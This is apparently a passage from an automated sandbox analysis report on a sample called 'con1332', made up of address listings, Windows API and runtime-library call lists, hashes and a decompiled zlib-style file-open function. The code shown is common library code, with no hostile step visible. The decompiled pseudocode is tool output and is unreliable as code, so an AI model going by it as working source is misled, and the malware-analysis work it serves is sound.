                                                                                                                                                                                                                                    0x004170c5
                                                                                                                                                                                                                                    0x004170cb
                                                                                                                                                                                                                                    0x004170ce
                                                                                                                                                                                                                                    0x004170d0
                                                                                                                                                                                                                                    0x004170d0
                                                                                                                                                                                                                                    0x004170bd
                                                                                                                                                                                                                                    0x004170bd
                                                                                                                                                                                                                                    0x004170bd
                                                                                                                                                                                                                                    0x004170bb
                                                                                                                                                                                                                                    0x004170dd
                                                                                                                                                                                                                                    0x00417101
                                                                                                                                                                                                                                    0x00417101
                                                                                                                                                                                                                                    0x00417109
                                                                                                                                                                                                                                    0x004172bb
                                                                                                                                                                                                                                    0x004172be
                                                                                                                                                                                                                                    0x004172c1
                                                                                                                                                                                                                                    0x004172c4
                                                                                                                                                                                                                                    0x004172cb
                                                                                                                                                                                                                                    0x004172cb
                                                                                                                                                                                                                                    0x004172ce
                                                                                                                                                                                                                                    0x004172d1
                                                                                                                                                                                                                                    0x004172d8
                                                                                                                                                                                                                                    0x004172d8
                                                                                                                                                                                                                                    0x004172de
                                                                                                                                                                                                                                    0x004172e4
                                                                                                                                                                                                                                    0x004172e7
                                                                                                                                                                                                                                    0x004172ea
                                                                                                                                                                                                                                    0x004172f3
                                                                                                                                                                                                                                    0x004172f6
                                                                                                                                                                                                                                    0x004173ef
                                                                                                                                                                                                                                    0x004173f1
                                                                                                                                                                                                                                    0x004173f1
                                                                                                                                                                                                                                    0x004173f4
                                                                                                                                                                                                                                    0x004173f6
                                                                                                                                                                                                                                    0x004173f9
                                                                                                                                                                                                                                    0x004173fe
                                                                                                                                                                                                                                    0x004173ff
                                                                                                                                                                                                                                    0x00417402
                                                                                                                                                                                                                                    0x00417404
                                                                                                                                                                                                                                    0x00417406
                                                                                                                                                                                                                                    0x00417409
                                                                                                                                                                                                                                    0x0041740b
                                                                                                                                                                                                                                    0x0041740c
                                                                                                                                                                                                                                    0x00417411
                                                                                                                                                                                                                                    0x00417409
                                                                                                                                                                                                                                    0x00417412
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417412
                                                                                                                                                                                                                                    0x00417309
                                                                                                                                                                                                                                    0x0041730e
                                                                                                                                                                                                                                    0x00417311
                                                                                                                                                                                                                                    0x00417314
                                                                                                                                                                                                                                    0x00417316
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041732a
                                                                                                                                                                                                                                    0x0041732c
                                                                                                                                                                                                                                    0x0041732f
                                                                                                                                                                                                                                    0x00417331
                                                                                                                                                                                                                                    0x0041733a
                                                                                                                                                                                                                                    0x00417379
                                                                                                                                                                                                                                    0x00417379
                                                                                                                                                                                                                                    0x00417379
                                                                                                                                                                                                                                    0x0041737b
                                                                                                                                                                                                                                    0x0041737b
                                                                                                                                                                                                                                    0x0041737d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417384
                                                                                                                                                                                                                                    0x0041739c
                                                                                                                                                                                                                                    0x0041739e
                                                                                                                                                                                                                                    0x004173a1
                                                                                                                                                                                                                                    0x004173a3
                                                                                                                                                                                                                                    0x004173bf
                                                                                                                                                                                                                                    0x004173c1
                                                                                                                                                                                                                                    0x004173c9
                                                                                                                                                                                                                                    0x004173cb
                                                                                                                                                                                                                                    0x004173cb
                                                                                                                                                                                                                                    0x004173a5
                                                                                                                                                                                                                                    0x004173a5
                                                                                                                                                                                                                                    0x004173a5
                                                                                                                                                                                                                                    0x004173cf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004173d4
                                                                                                                                                                                                                                    0x0041733c
                                                                                                                                                                                                                                    0x0041733f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417341
                                                                                                                                                                                                                                    0x00417344
                                                                                                                                                                                                                                    0x00417349
                                                                                                                                                                                                                                    0x00417362
                                                                                                                                                                                                                                    0x00417368
                                                                                                                                                                                                                                    0x0041736a
                                                                                                                                                                                                                                    0x0041736c
                                                                                                                                                                                                                                    0x00417372
                                                                                                                                                                                                                                    0x00417372
                                                                                                                                                                                                                                    0x00417372
                                                                                                                                                                                                                                    0x00417375
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417375
                                                                                                                                                                                                                                    0x0041734b
                                                                                                                                                                                                                                    0x00417350
                                                                                                                                                                                                                                    0x00417352
                                                                                                                                                                                                                                    0x00417354
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417356
                                                                                                                                                                                                                                    0x0041735c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041735c
                                                                                                                                                                                                                                    0x00417333
                                                                                                                                                                                                                                    0x00417333
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417117
                                                                                                                                                                                                                                    0x0041711a
                                                                                                                                                                                                                                    0x004172ec
                                                                                                                                                                                                                                    0x004172ec
                                                                                                                                                                                                                                    0x00417414
                                                                                                                                                                                                                                    0x00417425
                                                                                                                                                                                                                                    0x00417425
                                                                                                                                                                                                                                    0x00417120
                                                                                                                                                                                                                                    0x00417126
                                                                                                                                                                                                                                    0x0041712d
                                                                                                                                                                                                                                    0x0041712d
                                                                                                                                                                                                                                    0x00417130
                                                                                                                                                                                                                                    0x00417153
                                                                                                                                                                                                                                    0x00417155
                                                                                                                                                                                                                                    0x00417157
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041715d
                                                                                                                                                                                                                                    0x0041715d
                                                                                                                                                                                                                                    0x004171a2
                                                                                                                                                                                                                                    0x004171a2
                                                                                                                                                                                                                                    0x004171a5
                                                                                                                                                                                                                                    0x004171a8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004171c1
                                                                                                                                                                                                                                    0x004172aa
                                                                                                                                                                                                                                    0x004172ad
                                                                                                                                                                                                                                    0x004172b2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004172b5
                                                                                                                                                                                                                                    0x004171c7
                                                                                                                                                                                                                                    0x004171db
                                                                                                                                                                                                                                    0x004171dd
                                                                                                                                                                                                                                    0x004171e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004171ef
                                                                                                                                                                                                                                    0x0041721a
                                                                                                                                                                                                                                    0x0041721c
                                                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                                                    0x00417265
                                                                                                                                                                                                                                    0x00417265
                                                                                                                                                                                                                                    0x00417267
                                                                                                                                                                                                                                    0x00417277
                                                                                                                                                                                                                                    0x0041727d
                                                                                                                                                                                                                                    0x0041727f
                                                                                                                                                                                                                                    0x00417281
                                                                                                                                                                                                                                    0x00417282
                                                                                                                                                                                                                                    0x00417283
                                                                                                                                                                                                                                    0x00417286
                                                                                                                                                                                                                                    0x0041728c
                                                                                                                                                                                                                                    0x0041728f
                                                                                                                                                                                                                                    0x00417288
                                                                                                                                                                                                                                    0x00417288
                                                                                                                                                                                                                                    0x00417289
                                                                                                                                                                                                                                    0x00417289
                                                                                                                                                                                                                                    0x004172a0
                                                                                                                                                                                                                                    0x004172a0
                                                                                                                                                                                                                                    0x004172a4
                                                                                                                                                                                                                                    0x004172a9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417267
                                                                                                                                                                                                                                    0x00417222
                                                                                                                                                                                                                                    0x00417223
                                                                                                                                                                                                                                    0x00417225
                                                                                                                                                                                                                                    0x00417228
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041722a
                                                                                                                                                                                                                                    0x0041722a
                                                                                                                                                                                                                                    0x0041722e
                                                                                                                                                                                                                                    0x00417233
                                                                                                                                                                                                                                    0x0041724c
                                                                                                                                                                                                                                    0x00417252
                                                                                                                                                                                                                                    0x00417254
                                                                                                                                                                                                                                    0x00417256
                                                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                                                    0x0041725f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041725f
                                                                                                                                                                                                                                    0x00417235
                                                                                                                                                                                                                                    0x0041723a
                                                                                                                                                                                                                                    0x0041723c
                                                                                                                                                                                                                                    0x0041723e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417240
                                                                                                                                                                                                                                    0x00417246
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417246
                                                                                                                                                                                                                                    0x004171f4
                                                                                                                                                                                                                                    0x00417213
                                                                                                                                                                                                                                    0x00417213
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004171f4
                                                                                                                                                                                                                                    0x00417163
                                                                                                                                                                                                                                    0x00417164
                                                                                                                                                                                                                                    0x00417169
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041716b
                                                                                                                                                                                                                                    0x0041716b
                                                                                                                                                                                                                                    0x00417174
                                                                                                                                                                                                                                    0x0041718a
                                                                                                                                                                                                                                    0x00417190
                                                                                                                                                                                                                                    0x00417192
                                                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                                                    0x00417194
                                                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                                                    0x00417176
                                                                                                                                                                                                                                    0x0041717b
                                                                                                                                                                                                                                    0x0041717f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417181
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417181
                                                                                                                                                                                                                                    0x00417157
                                                                                                                                                                                                                                    0x00417109
                                                                                                                                                                                                                                    0x004170df
                                                                                                                                                                                                                                    0x004170e2
                                                                                                                                                                                                                                    0x004170e5
                                                                                                                                                                                                                                    0x004170e5
                                                                                                                                                                                                                                    0x004170e8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004170ea
                                                                                                                                                                                                                                    0x004170ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004170ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004170ef
                                                                                                                                                                                                                                    0x004170f7
                                                                                                                                                                                                                                    0x004170fb
                                                                                                                                                                                                                                    0x004170fd
                                                                                                                                                                                                                                    0x004170fd
                                                                                                                                                                                                                                    0x004170fe
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,047418B0), ref: 004170C5
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                                                    • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3809854901-0
                                                                                                                                                                                                                                    • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                                                                                    • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02C072E8 Relevance: 22.8, APIs: 15, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02C0731A
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 02C0732C
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 02C073F1
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 02C074B3
                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 02C074DE
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 02C07501
                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 02C0750B
                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 02C07514
                                                                                                                                                                                                                                    • ___ansicp.LIBCMT ref: 02C07545
                                                                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 02C07570
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 02C075C9
                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 02C075EB
                                                                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 02C07621
                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 02C07636
                                                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02C07650
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2918745354-0
                                                                                                                                                                                                                                    • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                                                                                    • Instruction ID: 9b96aac64b677de533b8924222a0504709a78467900fb45aed907d283ac1c896
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2B1C472800119EFDF199FA4CCC08EEBFB5EB88354F148469FA15A6190D730EA58DF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02C0083C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,02C00977,00000000,00000000,?,00000001,02BFC22D,02BFB993), ref: 02C0084E
                                                                                                                                                                                                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 02C00859
                                                                                                                                                                                                                                      • Part of subcall function 02BFE9D1: Sleep.KERNEL32(000003E8,00000000,?,02C0079F,KERNEL32.DLL,?,02C007EB,?,00000001,02BFC22D,02BFB993), ref: 02BFE9DD
                                                                                                                                                                                                                                      • Part of subcall function 02BFE9D1: GetModuleHandleW.KERNEL32(00000001,?,02C0079F,KERNEL32.DLL,?,02C007EB,?,00000001,02BFC22D,02BFB993), ref: 02BFE9E6
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 02C008B4
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 02C008C1
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 02C008D5
                                                                                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 02C008F3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                    • String ID: @.B$KERNEL32.DLL
                                                                                                                                                                                                                                    • API String ID: 4021795732-2520587274
                                                                                                                                                                                                                                    • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                                                                                                                    • Instruction ID: ca0bb858f56b25e47c4919c3899d5c59da6c0f8b753f667fb72eaab3c7a71632
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D11D271900701EED720AF35D84079ABBE0AF04310F10856ED9A9932E1CB749645CF98
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

































                                                                                                                                                                                                                                    0x004057b7
                                                                                                                                                                                                                                    0x004057bf
                                                                                                                                                                                                                                    0x004057c3
                                                                                                                                                                                                                                    0x004057c5
                                                                                                                                                                                                                                    0x004057cd
                                                                                                                                                                                                                                    0x004059c8
                                                                                                                                                                                                                                    0x004059ce
                                                                                                                                                                                                                                    0x004057db
                                                                                                                                                                                                                                    0x004057e3
                                                                                                                                                                                                                                    0x004057e5
                                                                                                                                                                                                                                    0x004057ea
                                                                                                                                                                                                                                    0x00405921
                                                                                                                                                                                                                                    0x0040592a
                                                                                                                                                                                                                                    0x004057f0
                                                                                                                                                                                                                                    0x004057f3
                                                                                                                                                                                                                                    0x004057f6
                                                                                                                                                                                                                                    0x004057f9
                                                                                                                                                                                                                                    0x004057fc
                                                                                                                                                                                                                                    0x004057ff
                                                                                                                                                                                                                                    0x00405801
                                                                                                                                                                                                                                    0x00405804
                                                                                                                                                                                                                                    0x00405807
                                                                                                                                                                                                                                    0x0040580a
                                                                                                                                                                                                                                    0x0040580d
                                                                                                                                                                                                                                    0x00405810
                                                                                                                                                                                                                                    0x00405813
                                                                                                                                                                                                                                    0x00405816
                                                                                                                                                                                                                                    0x00405819
                                                                                                                                                                                                                                    0x0040581c
                                                                                                                                                                                                                                    0x00405824
                                                                                                                                                                                                                                    0x00405827
                                                                                                                                                                                                                                    0x0040582b
                                                                                                                                                                                                                                    0x0040582e
                                                                                                                                                                                                                                    0x00405831
                                                                                                                                                                                                                                    0x00405834
                                                                                                                                                                                                                                    0x00405837
